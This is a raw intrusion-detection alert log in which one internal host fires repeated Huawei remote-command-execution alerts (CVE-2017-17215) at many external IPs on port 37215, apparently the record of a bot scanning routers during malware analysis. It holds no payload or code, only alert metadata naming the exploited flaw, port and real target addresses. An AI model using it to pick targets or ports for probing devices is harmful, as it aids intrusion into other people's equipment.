                                                    07/10/24-08:26:38.624233TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5529837215192.168.2.14197.103.192.62
                                                    07/10/24-08:27:32.608891TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4211437215192.168.2.14197.202.228.76
                                                    07/10/24-08:26:57.565173TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5556237215192.168.2.1448.253.2.87
                                                    07/10/24-08:26:25.478024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3703837215192.168.2.14131.212.181.233
                                                    07/10/24-08:26:29.780436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6066037215192.168.2.14157.215.47.55
                                                    07/10/24-08:26:34.207017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3905037215192.168.2.1441.45.196.151
                                                    07/10/24-08:26:43.849497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849437215192.168.2.1441.191.150.214
                                                    07/10/24-08:26:59.651235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359637215192.168.2.1488.175.241.168
                                                    07/10/24-08:26:36.357505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5444637215192.168.2.1441.124.206.56
                                                    07/10/24-08:27:20.405672TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4233837215192.168.2.14197.73.83.1
                                                    07/10/24-08:26:23.345555TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987237215192.168.2.14197.246.60.175
                                                    07/10/24-08:27:13.990716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4822237215192.168.2.14129.82.21.120
                                                    07/10/24-08:27:33.762956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4557037215192.168.2.14157.64.12.128
                                                    07/10/24-08:26:17.996521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5325237215192.168.2.14197.21.29.223
                                                    07/10/24-08:26:41.305234TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4343637215192.168.2.14197.129.223.235
                                                    07/10/24-08:27:22.469991TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3766837215192.168.2.1483.236.108.47
                                                    07/10/24-08:26:34.193253TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207637215192.168.2.14157.89.156.198
                                                    07/10/24-08:26:23.299402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5509037215192.168.2.1441.60.172.193
                                                    07/10/24-08:26:55.471512TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4196637215192.168.2.1483.144.50.207
                                                    07/10/24-08:27:17.083143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5539637215192.168.2.14157.60.39.199
                                                    07/10/24-08:27:27.174460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4127037215192.168.2.1417.26.134.8
                                                    07/10/24-08:27:05.169661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5123237215192.168.2.1414.99.244.118
                                                    07/10/24-08:26:51.988171TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896037215192.168.2.1441.175.16.80
                                                    07/10/24-08:26:45.598078TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3543237215192.168.2.14183.67.122.30
                                                    07/10/24-08:26:47.926462TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447637215192.168.2.1441.9.69.71
                                                    07/10/24-08:27:13.867822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4922437215192.168.2.14157.186.226.249
                                                    07/10/24-08:26:47.967087TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4784437215192.168.2.14121.183.221.79
                                                    07/10/24-08:26:15.875738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5278237215192.168.2.1479.11.44.193
                                                    07/10/24-08:27:07.368181TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5786037215192.168.2.14208.162.13.4
                                                    07/10/24-08:26:11.547112TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5751237215192.168.2.14197.5.82.148
                                                    07/10/24-08:27:24.893160TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3427637215192.168.2.14180.235.84.112
                                                    07/10/24-08:26:43.914560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5628637215192.168.2.14157.240.44.139
                                                    07/10/24-08:26:38.557842TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3852237215192.168.2.1458.61.143.38
                                                    07/10/24-08:26:42.385136TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4942437215192.168.2.14157.122.27.109
                                                    07/10/24-08:26:52.068814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5746037215192.168.2.14197.11.4.141
                                                    07/10/24-08:26:42.419623TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3663237215192.168.2.1441.152.200.86
                                                    07/10/24-08:26:53.185788TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3459837215192.168.2.14197.44.52.48
                                                    07/10/24-08:26:13.817964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5586037215192.168.2.14157.27.198.248
                                                    07/10/24-08:26:17.996521TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3723637215192.168.2.14199.147.16.201
                                                    07/10/24-08:26:59.528583TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786437215192.168.2.14157.17.165.147
                                                    07/10/24-08:27:32.577578TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392837215192.168.2.14197.26.204.125
                                                    07/10/24-08:26:18.019424TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4268637215192.168.2.14150.23.235.25
                                                    07/10/24-08:26:31.099427TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4388237215192.168.2.1441.235.242.18
                                                    07/10/24-08:26:28.732264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4629837215192.168.2.14183.118.197.246
                                                    07/10/24-08:27:17.093550TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5679037215192.168.2.14157.88.68.38
                                                    07/10/24-08:26:23.290002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3972237215192.168.2.14197.179.84.156
                                                    07/10/24-08:27:22.828817TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3865037215192.168.2.14219.77.85.61
                                                    07/10/24-08:26:47.860875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5694837215192.168.2.14157.7.33.184
                                                    07/10/24-08:27:22.472929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662637215192.168.2.1488.170.82.71
                                                    07/10/24-08:26:42.440990TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485237215192.168.2.14191.212.106.96
                                                    07/10/24-08:26:55.296464TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4640837215192.168.2.14157.118.240.26
                                                    07/10/24-08:27:22.879790TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6037237215192.168.2.1441.145.61.95
                                                    07/10/24-08:26:38.623017TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4929037215192.168.2.1441.133.49.98
                                                    07/10/24-08:26:22.279073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5705837215192.168.2.1441.127.39.6
                                                    07/10/24-08:26:43.763647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4300437215192.168.2.14197.206.73.100
                                                    07/10/24-08:26:34.248893TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5205237215192.168.2.1441.129.231.69
                                                    07/10/24-08:26:14.775624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734037215192.168.2.1494.90.95.20
                                                    07/10/24-08:26:25.481164TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3773037215192.168.2.14197.248.233.65
                                                    07/10/24-08:26:53.150508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5584837215192.168.2.14121.169.96.166
                                                    07/10/24-08:27:02.918908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4023037215192.168.2.14157.0.52.155
                                                    07/10/24-08:26:53.141329TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009037215192.168.2.14197.41.38.126
                                                    07/10/24-08:27:23.942038TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4642437215192.168.2.14166.217.208.167
                                                    07/10/24-08:27:20.421693TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3806237215192.168.2.1420.242.68.83
                                                    07/10/24-08:27:32.610394TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3965237215192.168.2.1441.58.175.206
                                                    07/10/24-08:26:28.771249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338037215192.168.2.14157.187.186.58
                                                    07/10/24-08:26:23.328619TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6072037215192.168.2.14197.221.236.114
                                                    07/10/24-08:26:59.713001TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3448437215192.168.2.1499.78.42.209
                                                    07/10/24-08:26:28.917896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575837215192.168.2.14197.10.70.58
                                                    07/10/24-08:26:43.582733TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5839037215192.168.2.1419.21.253.163
                                                    07/10/24-08:26:13.828221TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5835037215192.168.2.14157.57.24.152
                                                    07/10/24-08:26:22.299447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3464037215192.168.2.14207.230.121.245
                                                    07/10/24-08:26:13.759020TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3469237215192.168.2.14157.0.207.158
                                                    07/10/24-08:26:41.528499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3424437215192.168.2.14197.236.75.243
                                                    07/10/24-08:26:26.531286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567237215192.168.2.1420.224.37.228
                                                    07/10/24-08:27:02.887969TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4596237215192.168.2.14162.63.7.115
                                                    07/10/24-08:26:52.009687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4897837215192.168.2.14197.232.140.192
                                                    07/10/24-08:26:42.168081TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3315237215192.168.2.14157.136.201.167
                                                    07/10/24-08:26:25.523968TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4409037215192.168.2.14103.168.187.46
                                                    07/10/24-08:26:38.565170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3824837215192.168.2.14197.92.34.189
                                                    07/10/24-08:27:32.574488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3326437215192.168.2.14157.40.152.35
                                                    07/10/24-08:26:49.781764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924837215192.168.2.1441.56.156.158
                                                    07/10/24-08:26:52.020494TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5012437215192.168.2.1441.239.14.155
                                                    07/10/24-08:26:49.779389TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5152637215192.168.2.14157.89.167.221
                                                    07/10/24-08:27:28.171262TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5101837215192.168.2.14191.240.35.219
                                                    07/10/24-08:26:13.776398TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5814237215192.168.2.1441.120.237.207
                                                    07/10/24-08:26:28.916413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5554837215192.168.2.14157.218.49.230
                                                    07/10/24-08:26:33.189760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6090237215192.168.2.14157.145.33.46
                                                    07/10/24-08:26:38.533121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4380837215192.168.2.1444.67.85.13
                                                    07/10/24-08:26:59.881196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5887437215192.168.2.1441.17.244.184
                                                    07/10/24-08:26:26.441172TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4174437215192.168.2.14197.151.194.228
                                                    07/10/24-08:27:24.999763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5424037215192.168.2.1441.129.62.170
                                                    07/10/24-08:26:53.171769TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4408237215192.168.2.14168.137.96.206
                                                    07/10/24-08:27:19.145980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4018637215192.168.2.1441.10.89.83
                                                    07/10/24-08:26:23.318563TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5162437215192.168.2.14222.30.131.186
                                                    07/10/24-08:26:28.890895TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652637215192.168.2.1469.124.78.93
                                                    07/10/24-08:27:28.177796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4489437215192.168.2.1413.229.16.214
                                                    07/10/24-08:26:23.350374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4987437215192.168.2.14157.197.126.114
                                                    07/10/24-08:27:24.976551TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3393437215192.168.2.1441.252.23.99
                                                    07/10/24-08:27:31.457680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4293037215192.168.2.1441.152.204.186
                                                    07/10/24-08:26:43.766311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5342637215192.168.2.14157.124.212.30
                                                    07/10/24-08:26:23.326882TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5156837215192.168.2.14197.193.151.203
                                                    07/10/24-08:26:14.829275TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5585437215192.168.2.14157.162.214.168
                                                    07/10/24-08:27:30.508091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373237215192.168.2.14106.159.152.104
                                                    07/10/24-08:26:52.062166TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3864037215192.168.2.14129.216.39.228
                                                    07/10/24-08:26:23.305331TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952637215192.168.2.14111.129.101.161
                                                    07/10/24-08:26:45.661984TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5807837215192.168.2.14134.145.128.126
                                                    07/10/24-08:26:49.808476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5721637215192.168.2.1441.175.185.255
                                                    07/10/24-08:26:33.254680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3781637215192.168.2.14197.94.14.33
                                                    07/10/24-08:26:59.559919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4705037215192.168.2.14197.63.70.197
                                                    07/10/24-08:26:59.603648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5392437215192.168.2.1441.62.228.111
                                                    07/10/24-08:26:22.269979TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5806437215192.168.2.1441.247.70.62
                                                    07/10/24-08:26:36.411416TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5192237215192.168.2.14197.255.230.28
                                                    07/10/24-08:27:10.576651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022837215192.168.2.14197.2.64.143
                                                    07/10/24-08:27:13.988913TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5166237215192.168.2.14157.255.39.138
                                                    07/10/24-08:27:23.493040TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470837215192.168.2.1441.121.73.114
                                                    07/10/24-08:27:27.128635TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4541037215192.168.2.1441.111.179.53
                                                    07/10/24-08:27:24.878204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4520037215192.168.2.1474.204.113.242
                                                    07/10/24-08:27:27.084495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5916837215192.168.2.14157.10.174.163
                                                    07/10/24-08:26:26.600322TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3751837215192.168.2.14107.229.45.106
                                                    07/10/24-08:26:28.912648TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5836437215192.168.2.1441.238.34.117
                                                    07/10/24-08:26:28.938388TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5678837215192.168.2.14197.58.208.235
                                                    07/10/24-08:26:55.451906TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5381037215192.168.2.1447.57.142.188
                                                    07/10/24-08:27:28.151142TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513637215192.168.2.1441.206.98.157
                                                    07/10/24-08:26:52.005613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5934637215192.168.2.14157.60.156.143
                                                    07/10/24-08:27:27.168343TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5156637215192.168.2.1441.79.131.184
                                                    07/10/24-08:27:31.559678TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3907237215192.168.2.14157.63.160.5
                                                    07/10/24-08:26:41.568128TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3520037215192.168.2.1441.89.19.62
                                                    07/10/24-08:27:02.989706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3870037215192.168.2.14197.97.21.251
                                                    07/10/24-08:26:36.365413TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763037215192.168.2.1441.19.187.173
                                                    07/10/24-08:26:48.005447TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4132437215192.168.2.1441.164.110.108
                                                    07/10/24-08:26:13.828084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3299037215192.168.2.1458.255.75.233
                                                    07/10/24-08:26:22.286064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6086437215192.168.2.14157.43.210.100
                                                    07/10/24-08:26:55.385605TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283237215192.168.2.1441.226.19.45
                                                    07/10/24-08:26:41.560795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5542037215192.168.2.1441.176.100.194
                                                    07/10/24-08:26:47.949660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4909437215192.168.2.14157.42.104.97
                                                    07/10/24-08:27:30.443855TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533437215192.168.2.1441.179.162.148
                                                    07/10/24-08:26:43.900860TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5784837215192.168.2.14197.24.4.24
                                                    07/10/24-08:27:13.761850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3672437215192.168.2.14197.14.88.192
                                                    07/10/24-08:27:32.577578TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5425437215192.168.2.14209.166.121.166
                                                    07/10/24-08:27:33.942019TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5367837215192.168.2.14157.130.69.4
                                                    07/10/24-08:26:49.901812TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485437215192.168.2.1441.112.123.162
                                                    07/10/24-08:27:13.858837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945237215192.168.2.1441.204.88.56
                                                    07/10/24-08:26:15.824245TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4091437215192.168.2.1441.86.211.212
                                                    07/10/24-08:26:31.069950TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3385037215192.168.2.1441.191.148.156
                                                    07/10/24-08:26:59.804937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5605437215192.168.2.1441.167.177.143
                                                    07/10/24-08:27:02.880964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3743837215192.168.2.14157.13.81.116
                                                    07/10/24-08:27:11.529436TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3567237215192.168.2.14197.156.236.163
                                                    07/10/24-08:26:42.428149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3525037215192.168.2.1441.231.211.74
                                                    07/10/24-08:26:59.605859TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5791437215192.168.2.14197.169.149.135
                                                    07/10/24-08:26:59.714271TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5571037215192.168.2.1441.230.80.139
                                                    07/10/24-08:26:47.871507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3941837215192.168.2.14197.135.164.55
                                                    07/10/24-08:26:13.850183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4605437215192.168.2.1441.27.126.23
                                                    07/10/24-08:27:11.489140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4507637215192.168.2.14157.36.137.197
                                                    07/10/24-08:27:05.190892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3926237215192.168.2.14157.170.102.139
                                                    07/10/24-08:27:19.317209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3903037215192.168.2.1445.194.219.199
                                                    07/10/24-08:26:29.819391TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4184837215192.168.2.1441.239.48.106
                                                    07/10/24-08:26:33.177669TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389437215192.168.2.14157.112.129.116
                                                    07/10/24-08:27:31.534689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4582037215192.168.2.1441.1.91.81
                                                    07/10/24-08:26:29.780435TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5559037215192.168.2.1441.136.227.10
                                                    07/10/24-08:27:08.314829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4992437215192.168.2.14197.80.7.162
                                                    07/10/24-08:27:34.124417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5078037215192.168.2.14197.151.234.92
                                                    07/10/24-08:26:25.467613TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5903637215192.168.2.14180.50.237.247
                                                    07/10/24-08:27:31.528141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4770837215192.168.2.14157.49.178.5
                                                    07/10/24-08:26:36.406551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4835637215192.168.2.1444.104.91.108
                                                    07/10/24-08:26:43.831201TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3764037215192.168.2.1441.202.147.23
                                                    07/10/24-08:26:57.583179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683237215192.168.2.14157.215.138.130
                                                    07/10/24-08:27:14.867068TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5672237215192.168.2.1465.225.97.198
                                                    07/10/24-08:27:32.574488TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4784437215192.168.2.1450.48.61.59
                                                    07/10/24-08:27:33.915892TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5598237215192.168.2.14197.228.122.137
                                                    07/10/24-08:27:23.453421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4392437215192.168.2.1441.164.177.79
                                                    07/10/24-08:27:30.545208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354037215192.168.2.1441.193.194.19
                                                    07/10/24-08:26:18.019292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5607637215192.168.2.14157.147.46.115
                                                    07/10/24-08:26:47.994983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3974237215192.168.2.14142.215.0.104
                                                    07/10/24-08:27:24.948023TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3581237215192.168.2.1441.194.252.200
                                                    07/10/24-08:26:28.739643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5489237215192.168.2.14101.67.36.101
                                                    07/10/24-08:26:41.285291TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5855837215192.168.2.14157.233.134.10
                                                    07/10/24-08:27:07.344618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5727437215192.168.2.14197.238.239.217
                                                    07/10/24-08:27:07.361237TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285837215192.168.2.14157.89.52.203
                                                    07/10/24-08:26:43.559521TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181237215192.168.2.14157.255.61.38
                                                    07/10/24-08:26:14.828226TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4721637215192.168.2.1441.30.169.236
                                                    07/10/24-08:26:22.285937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316437215192.168.2.14157.145.26.87
                                                    07/10/24-08:26:52.013451TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3534437215192.168.2.14197.154.247.200
                                                    07/10/24-08:26:11.112995TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257437215192.168.2.1441.204.232.11
                                                    07/10/24-08:27:33.744457TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3804637215192.168.2.1441.126.125.121
                                                    07/10/24-08:26:11.165821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684637215192.168.2.14157.102.180.139
